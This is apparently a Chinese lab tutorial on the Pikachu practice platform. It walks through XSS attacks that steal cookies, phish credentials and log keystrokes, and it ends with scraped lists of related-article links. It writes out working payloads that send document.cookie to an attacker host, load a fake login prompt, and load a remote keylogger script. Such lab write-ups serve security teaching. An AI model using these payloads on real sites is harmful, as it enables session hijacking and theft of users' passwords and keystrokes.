1、获取cookie的原理和实验演示

《get型xss》

第一步:搭建xss的后台

打开pikachu xss的后台管理工具(在pikachu漏洞平台底部---->管理工具----->xss后台)

根据提示进行安装,修改配置文件,即数据库的账户和密码

接下来,根据提示进行安装/初始化,然后进行登录


后台登录成功

现在xss后台没有任何数据


第二步:先将pikachu中cookie.php改为自己本地的ip,重定向到一个可信的网站,我的ip如下

路径为:D:\phpstudy2018\PHPTutorial\WWW\pikachu\pkxss\xcookie\cookie.php**


第三步:修改字符输入长度

第四步:输入框中输入如下playload,然后重定向到Pikachu的首页

<script>document.location = 'http://192.168.159.146:8080/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

第五步:此时查看xss后台,进行刷新

第六步:如果黑客将referer中的url链接发送给普通用户,一旦其访问这个链接,用户便跳转到首页,但是黑客就会获取到cookie

《post型xss》

第一步:登录,用户:admin,密码:123456。在输入框中输入一个参数,进行抓包

抓包查看:通过post方式传到后台,无法使用url进行攻击

第二步:伪造表单自动提交页面(路径:E:\phpStudy\PHPTutorial\WWW\pikachu\pkxss\xcookie\post.html)

注:修改完后要重启phpstudy服务

第三步:模拟的恶意站点

192.168.159.146:8080/pikachu/pkxss/xcookie/post.html

第四步:用户通过访问这个站点,然后跳转到首页,攻击者后台获取cookie

2、XSS进行钓鱼的原理和实验演示

《存储型XSS》

第一步:修改文件fish.php的ip(我的文件路径:E:\phpStudy\PHPTutorial\WWW\pikachu\pkxss\xfish)

注:这里需要注意的是,要将username和password中间的空格删除,拼接在一块。不然实验无法成功

第二步:在存在存储型xss漏洞的页面插入js代码请求

<img  src=" http://192.168.159.146:8080/pikachu/pkxss/xfish/fish.php"  />
<script  src="http://192.168.159.146:8080/pikachu/pkxss/xfish/fish.php"></script>

第三步:后台会有一个认证框,给用户发送。

第四步:用户一旦输入用户名和密码,就会重定向到后台,后台就会以get方式获取到用户名、密码

3、XSS获取键盘记录原理和实验演示

《存储型xss》

跨域的概念
http://       www    .      xyz.com    :     8080      /        script/test.js协议          子域名           主域名           端口                资源地址

当协议、主机(主域名,子域名)、端口中的任意一个不相同时,称为不同域。我们把不同的域之间请求数据的操作,成为跨域操作

同源策略

所谓同源策略,就是规定两个域名之间不能使用JS进行相互操作。比如x.com域名下的javascript并不能操作y.com域下的对象

如果想要跨域操作,则需要管理员进行特殊的配置

例:header(“Access-Control-Allow-Origin:x.com”)指定

Tips:下面这些标签跨域加载资源(资源类型是有限制的)是不受同源策略限制的

<script src="...">   //js加载到本地执行<img src="...">   //图片<link href="...">   //css<iframe src="..." >   //任意资源
为什么要有同源策略

A登录了淘宝,攻击者向A发送一个恶意链接urlb:http://www.盗你cookie.com

如果没有同源策略,即urlb上的js可以操作A的内容(如:获取cookie等)

有了同源策略,就限制了这种情况

实验演示

第一步:存入到数据库中,并且设置允许所有跨域访问,当然这里可设置自己想要允许的域

第二步:修改js文件中的ip,黑客通过用户输入获取键盘值,以post方式发送给攻击者后台

第三步:在留言板输入js代码

<script  src=" http://192.168.159.149:8080/pikachu/pkxss/rkeypress/rk.js">  </script>

第四步:打开控制的网络,不管输入什么,都是跳出页面请求失败

第五步:这时,后台已经获取了用户键盘输入的内容

XSS的漏洞测试案例相关推荐

  1. Web应用进行XSS漏洞测试

    对 WEB 应用进行 XSS 漏洞测试,不能仅仅局限于在 WEB 页面输入 XSS 攻击字段,然后提交.绕过 JavaScript 的检测,输入 XSS 脚本,通常被测试人员忽略.下图为 XSS 恶意 ...

  2. WEB漏洞测试(二)——HTML注入 XSS攻击

    上一篇介绍了我们安装BWAPP来完成我们的漏洞测试 在BWAPP中,将HTML Injection和XSS做了非常详细的分类,那么为什么要将两个一起讲呢?归根结底,我觉得这两个分明是一个玩意,充其量是 ...

  3. 回顾几个常见的XSS漏洞测试脚本

    回顾几个常见的XSS漏洞测试脚本 基础的测试: <script>alert('xss')</script> 如果过滤了指定标签 比如:<script>标签 < ...

  4. DOYO网站xss漏洞测试

    一.寻找xss漏洞 一般想获取最高权限,就要找存储型xss漏洞,这样的漏洞是服务器和浏览器进行数据交换的,有利于数据写入进去.一般留言板.评论区可能性最大. 1.评论区 <script>a ...

  5. xss 跨站脚本漏洞 php,跨站脚本漏洞(XSS)基础讲解

    XSS漏洞 一.文章简介 XSS漏洞是Web应用程序中最常见的漏洞之一.如果您的站点没有预防XSS漏洞的固定方法,那么很可能就存在XSS漏洞. 这篇文章将带你通过代码层面去理解三个问题: 什么是XSS ...

  6. 跨站脚本(XSS)漏洞

    文章目录 跨站脚本(XSS)漏洞概述 跨站脚本(xss)漏洞类型及测试流程 一,漏洞类型 二,测试流程 反射型跨站脚本漏洞之get&post 发射型xss演示 get和post典型区别 存储型 ...

  7. 基于TCP协议fuzz testing模糊测试案例分享

    1.模糊测试概念: 模糊测试 (fuzz testing, fuzzing)是一种软件测试技术.其核心思想是自动或半自动的生成随机数据输入到一个程序中,并监视程序异常,如崩溃,断言(assertion ...

  8. 跨站脚本(XSS)漏洞 (一)

    跨站脚本(XSS)漏洞 跨站脚本漏洞概述 Cross-Site Scripting 简称为"CSS",为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS. ...

  9. Drozer – Android APP安全评估工具(附测试案例)

    Drozer原名mercury,是一款不错的Android APP安全评估工具.现在有社区版/专业版两个版本. 具体的使用说明可以参考https://www.mwrinfosecurity.com/s ...

最新文章

  1. Java项目:食品溯源系统(java+Springboot+Maven+mybatis+Vue+mysql+wd)
  2. 【剑指offer】不使用新变量,交换两个变量的值,C++实现
  3. activity得到service的数据的方法
  4. window下pip 用不了的一种解决办法
  5. 关于GTID模式下备份时 --set-gtid-purged=OFF 参数的实验【转】
  6. CVPR 2020 | 3D目标检测泛化问题研究
  7. 2019.02.10 17:49
  8. 如何使用PowerShell在Azure中创建SQL虚拟机
  9. 什么是持续集成(CI)/持续部署(CD)?
  10. 09月27日 pytorch与resnet(二)
  11. 9个最常用的python深度学习库
  12. python贴吧-学点python吧,别再这么累了
  13. 开发对接微信卡包会员卡_微信公众号实现会员卡领取功能
  14. 机械考公一般有哪些岗位?
  15. html5 canvas画彩虹,HTML5/Canvas连接的彩虹点平滑动画
  16. [UE4] LogicDriver状态机基于管线(Conduit)的状态选择器
  17. CSS“隐藏”元素的几种方法的对比
  18. 基于SpringBoot+VUE的酒店管理信息系统的设计思路
  19. 软件测试工程师必备干货,移动应用测试【建议收藏】
  20. java读取jpg点数_我的世界:基岩版beta1.16.0.61修复59个“特性”,同步Java版?

热门文章

  1. 500m宽带服务器无响应,装维技巧|500M宽带接入下,手机WIFI能力揭秘
  2. JavaScript访问指纹仪采集指纹
  3. 家庭用电的基本知识(转载)
  4. win10临时暂停Microsoft defender阻止软件的运行
  5. Python:实现simulated annealing模拟退火算法(附完整源码)
  6. “麒麟计划”走进云南,联手共建“数字丽江”!
  7. python123九宫格输入法_【带你成为pyq最靓的仔】朋友圈九宫格(一)之图片切割篇...
  8. 软件测试肖sir___项目讲解之实战
  9. 【STM32 NET MF开发板学习-29】摄像头蓝牙图像远程获取
  10. 转贴: AV音响连接方法 - 回上个问题,次世代音轨通过HDMI透传给了功放,那图像信号怎么给到电视? 这篇文章教你...